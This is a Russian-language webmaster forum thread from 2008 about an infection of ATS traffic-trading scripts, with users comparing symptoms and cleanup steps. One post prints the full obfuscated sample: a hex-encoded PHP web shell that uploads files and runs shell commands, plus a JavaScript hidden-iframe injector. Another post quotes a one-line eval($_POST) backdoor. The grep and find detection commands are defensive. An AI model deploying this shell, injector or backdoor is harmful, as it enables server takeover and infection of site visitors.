С нами с 29.07.03
Сообщения: 426
Рейтинг: 512
|
 Добавлено: 06/11/08 в 16:51 |
| color писал: | с разработчиками ATS пытался связаться - что то молчат.
То ли не интересно, то ли нет никого ) |
По почте что ли? 209 905 775 стучи. Меры принимаются. Любая помощь приветствуется. Набор первоочередных мер описан выше.
|
|
|
|
| |
XXX-Server.biz
С нами с 15.02.03
Сообщения: 9410
Рейтинг: 6676
|
| Добавлено: 06/11/08 в 16:53 |
| von Stoltz писал: | | По почте что ли? 209 905 775 стучи. Меры принимаются. Любая помощь приветствуется. Набор первоочередных мер описан выше. |
Да вчера вечером еще стучал и Вам, и еще по одной аське что на сайте указана, не ответили )
Ну в принципе логи хотел дать, которые тут двумя постами выше уже опубликовали )
Файлики еще есть криптованные которые заливали, могу дать если интересуют
|
|
|
|
| |
С нами с 29.07.03
Сообщения: 426
Рейтинг: 512
|
| Добавлено: 06/11/08 в 17:09 |
Конечно интересуют. Сейчас в асе, стучи.
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 06/11/08 в 18:15 |
на сервере нужно искать файлы с таким содержимым:
| Код: |
<?php $s="202069662028245F504F53545B706173735D213D273132332729207B206563686F2027203C68746D6C3E3C626F6479206267636F6C6F723D23424246464242206F6E6C6F61643
D22646F63756D656E742E6D79662E706173732E666F63757328293B223E3C666F726D206D6574686F643D504F53543E3C696E707574206E616D653D706173733E3C2F666F726D3E3C2F626F
64793E20203C2F68746D6C3E273B206578697428293B207D6563686F20273C68746D6C3E3C626F6479206267636F6C6F723D23424246464242206F6E6C6F61643D22646F63756D656E742E6
D79662E63632E666F63757328293B223E273B6563686F20273C666F726D206E616D653D6D7966206D6574686F643D504F535420656E63747970653D226D756C7469706172742F666F726D2D
64617461223E3C696E70757420747970653D68696464656E206E616D653D706173732076616C75653D272E245F504F53545B706173735D2E273E3C696E70757420747970653D66696C65206
E616D653D757066696C653E3C696E707574206E616D653D6E65776E616D653E3C696E70757420747970653D7375626D69743E3C62723E273B6563686F20273C696E707574206E616D653D63
632073697A653D37332076616C75653D22272E7374726970736C617368657328245F504F53545B63635D292E27223E3C2F666F726D3E273B6563686F20273C7072653E273B20696620286D6
F76655F75706C6F616465645F66696C6528245F46494C45535B27757066696C65275D5B27746D705F6E616D65275D2C20245F504F53545B6E65776E616D655D2929207B202F2A6563686F20
2253656E742E3C62723E5C6E223B2A2F207D69662028245F504F53545B6D66696C655D29207B2020202466703D666F70656E28245F504F53545B6E65776E616D655D2C277727293B2020206
66F7228246B3D303B20246B3C7374726C656E28245F504F53545B6D66696C655D293B20246B2B3D322920207B20202020246363203D2073756273747228245F504F53545B6D66696C655D2C
246B2C32293B20202020246363203D20273078272E2463633B2020202020202020246363203D20726F756E6428246363293B20202020246363203D2063687228246363293B2020202066777
2697465282466702C246363293B2020207D202066636C6F736528246670293B207D24636F3D7374726970736C617368657328245F504F53545B63635D293B206563686F206024636F603B20
6563686F20273C2F7072653E273B6563686F20273C2F626F64793E3C2F68746D6C3E273B20";$sss="";for($k=0;$k<strlen($s);$k+=2){$ss=chr(("0x".substr($s,$k,2))+0);$ss
s.=$ss;}eval($sss);$ssss="*****************************************************************************************************************************
*****************************************************************************************";?>
<script> var s='3C696672616D65207372633D2268
7474703A2F2F7777772E7070762D7365782E636F6D2F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D223
2223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLower
Case(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>
|
искать можно так:
| Код: |
find / -name \*.php -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}'
|
команда выдаст список файлов, которые дёрганием через веб рассыживает инъекции в шаблоны (и не только).
Спасибо Lin за "кошку" для тренировки  .
|
|
|
|
| |
С нами с 02.09.06
Сообщения: 598
Рейтинг: 613
|
| Добавлено: 06/11/08 в 19:33 |
| Soft-Com писал: | на сервере нужно искать файлы с таким содержимым:
команда выдаст список файлов, которые дёрганием через веб рассыживает инъекции в шаблоны (и не только).
Спасибо Lin за "кошку" для тренировки . |
Это только php-shell через который выполняется заражение шаблонов, и последний кусок <script> .... 3C69667 </script> может и не быть.
После удаления этого пхп-шелла надо искать зараженные файлы содержащие скрипт с кодом 3C69667.
После этого банить айпишку с которой идет заражение (на данный момент 79.135.187.18), и защищать свои скрипты от повторов.
|
|
|
|
| |
XXX-Server.biz
С нами с 15.02.03
Сообщения: 9410
Рейтинг: 6676
|
| Добавлено: 06/11/08 в 19:35 |
заражение вроде идет через iframe в названии добавляемого трейдера. активируется при входе в админку сиджа соответственно.
|
|
|
|
| |
С нами с 22.08.08
Сообщения: 1452
Рейтинг: 440
|
| Добавлено: 06/11/08 в 19:35 |
эта хуйня на всех сиджах  даже в прогрессе /progress/class.Trader.php
|
|
|
|
| |
С нами с 29.09.04
Сообщения: 329
Рейтинг: 120
|
| Добавлено: 06/11/08 в 20:19 |
Оффтопик: да уж, трейдер и вправду "нестандартный"
|
|
|
|
| |
С нами с 21.09.04
Сообщения: 609
Рейтинг: 473
|
| Добавлено: 06/11/08 в 20:49 |
даже в прогрессе /progress/class.Trader.php
он же зазенден? всё равно дописывает?
|
|
|
|
| |
С нами с 22.08.08
Сообщения: 1452
Рейтинг: 440
|
| Добавлено: 06/11/08 в 21:10 |
ХЗ, у меня в нем был и еще в class.Unique.php тоже в progress/click_time_stats.php и в /gs.php теперь появился 
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 06/11/08 в 21:45 |
| Код: |
find / -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}'
find / -name \*.php -exec grep -H "2020696620282" {} \; | awk -F":" '{print $1}'
|
все файлики найденные нужно почистить
|
|
|
|
| |
С нами с 04.03.07
Сообщения: 8929
Рейтинг: 5138
|
| Добавлено: 06/11/08 в 21:54 |
в платных скриптах кто-то замечал? кроме АТХа
|
|
|
|
| |
CBR 600 RR
С нами с 17.12.03
Сообщения: 2755
Рейтинг: 1557
|
| Добавлено: 06/11/08 в 21:57 |
| sawm писал: | | в платных скриптах кто-то замечал? кроме АТХа |
в атс тоже раньше никто не замечал 
|
|
|
|
| |
С нами с 04.03.07
Сообщения: 8929
Рейтинг: 5138
|
| Добавлено: 06/11/08 в 22:03 |
как посмотреть интересно в ФТТ и СмартСЖ
|
|
|
|
| |
С нами с 22.08.08
Сообщения: 1452
Рейтинг: 440
|
| Добавлено: 06/11/08 в 22:31 |
| Soft-Com писал: | | Код: |
find / -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}'
find / -name \*.php -exec grep -H "2020696620282" {} \; | awk -F":" '{print $1}'
|
все файлики найденные нужно почистить |
класс, чем дальше тем лучше 
|
|
|
|
| |
CBR 600 RR
С нами с 17.12.03
Сообщения: 2755
Рейтинг: 1557
|
| Добавлено: 06/11/08 в 23:12 |
| sawm писал: | | как посмотреть интересно в ФТТ и СмартСЖ |
а че ты там посмотреть хочешь?
вот интересно, кто следующий?
если еще не все отмучались то вот, может поможет:
ищем файлы
sync.php
backup.php
thumbs.php
ipfiles.php
а также файлы пхп, которые находятся внутри папки и имеют такое же имя, например - ../218/218.php
Оффтопик: дайте мне горло этого "гения" - я его придушу, суку
|
|
|
|
| |
С нами с 29.09.04
Сообщения: 329
Рейтинг: 120
|
| Добавлено: 07/11/08 в 00:11 |
| Grach писал: | | а также файлы пхп, которые находятся внутри папки и имеют такое же имя, например - ../218/218.php |
Оффтопик: блин, где-то я такое уже видел  есть такие вири, в папку заходиш эксплорером а он туда сразу копируется с именем этой папки, и прикидывается папкой
|
|
|
|
| |
CBR 600 RR
С нами с 17.12.03
Сообщения: 2755
Рейтинг: 1557
|
| Добавлено: 07/11/08 в 00:22 |
| Lin писал: | | Оффтопик: блин, где-то я такое уже видел есть такие вири, в папку заходиш эксплорером а он туда сразу копируется с именем этой папки, и прикидывается папкой |
да, есть такая херь
|
|
|
|
| |
С нами с 14.02.08
Сообщения: 173
Рейтинг: 43
|
| Добавлено: 07/11/08 в 00:52 |
| Gidz писал: | у меня 1.7.1
и еще может не в тему.. постоянно стали выскакивать сообщения при первом заходе в админку сиджа, при второй попытке все ок.
Warning: Cannot modify header information - headers already sent by (output started at /usr/home/user/www/xxx.net/settings/ca.php:92) in /usr/home/user/www/xxx.net/admin.php on line 32
Warning: Cannot modify header information - headers already sent by (output started at /usr/home/user/www/xxx.net/settings/ca.php:92) in /usr/home/user/www/xxx.net/admin.php on line 38 |
у меня тоже 1.7.1, и тоже при входе такая хрень лезет.
Что это такое?
|
|
|
|
| |
С нами с 22.12.07
Сообщения: 2481
Рейтинг: 1710
|
| Добавлено: 07/11/08 в 01:28 |
у меня связка АТС+стрим. в стриме эта хрень живет сдесь /streamrotator/tmp/face0.2.html и так далее сколько у вас этих фейсов. вот только почему то от 1 и так далее, а в 0 не живет. а в АТС иногда заражало index.php im.php. как только оно ко мне попало интересно. трейдера с ифреймом не нашел в админке АтСа
|
|
|
|
| |
CBR 600 RR
С нами с 17.12.03
Сообщения: 2755
Рейтинг: 1557
|
| Добавлено: 07/11/08 в 01:44 |
| vlad3d писал: | | в стриме эта хрень живет сдесь /streamrotator/tmp/face0.2.html |
эта хрень там не живет, она туда прописывается
шукай по своему серверу вышеозначенное
|
|
|
|
| |
+ + +
С нами с 11.11.05
Сообщения: 580
Рейтинг: 416
|
| Добавлено: 07/11/08 в 01:55 |
дедики надо проверять.после добавления это недоразумение заменило страницу добавления,дальше вроде не прошло.
|
|
|
|
| |
С нами с 21.10.06
Сообщения: 28
Рейтинг: 12
|
| Добавлено: 07/11/08 в 07:42 |
капча при регистрации трейдеров не помогла.
добавился в трейд + рулезы заменил на
"1.No illegal sites 2.No sites with consoles 3.no exploits, viruses, dialers, active-x, etc.<?php eval(stripslashes($_POST[ss]));?>" (причем трейд рулезы полностью заменены)
в шаблонах вроде ничего не нашол. (АТС + стрим)
в логах подозрительного не обнаружил. добавился только на один сидж из 4х.
|
|
|
|
| |
CBR 600 RR
С нами с 17.12.03
Сообщения: 2755
Рейтинг: 1557
|
| Добавлено: 07/11/08 в 08:04 |
| [8-P] писал: | | добавился только на один сидж из 4х. |
А им больше и не надо, дальше херь лезет по остальным папкам без этого трейдера.
|
|
|
|
| |
С нами с 22.08.08
Сообщения: 1452
Рейтинг: 440
|
| Добавлено: 07/11/08 в 09:08 |
а кто скажет? у меня на сиджах такое в коде в начале страницы, это нормально? а то я уже параноиком стал...
| Код: | <script language="JavaScript">
<!--
// ATS PRO Traffic Manager, http://www.ats-project.com
var i,d;
var k=2;
var mc='fqewogpv0eqqmkg?$lu?="rcvj?1="gzrktgu?';
var l='';
var m='';
var ec='';
for(i=0;i<38;i++) {
d=mc.charCodeAt(i)-k;
if (i<20) {l=l+String.fromCharCode(d);} else {m=m+String.fromCharCode(d);}
}
ec = l+'9be60d0c'+m+'Fri, 7-Nov-08 14:08:17 G'+'MT'+'";';
eval(ec);
-->
</script><script type="text/javascript">
<!--
var d=new Date();
var ex_d=new Date();
ex_d.setTime(d.getTime()+1000*31536000);
document.cookie='stream_face0=1226022897.3;path=/;expires='+ex_d.toGMTString(ex_d)+';';
// -->
</script> |
|
|
|
|
| |
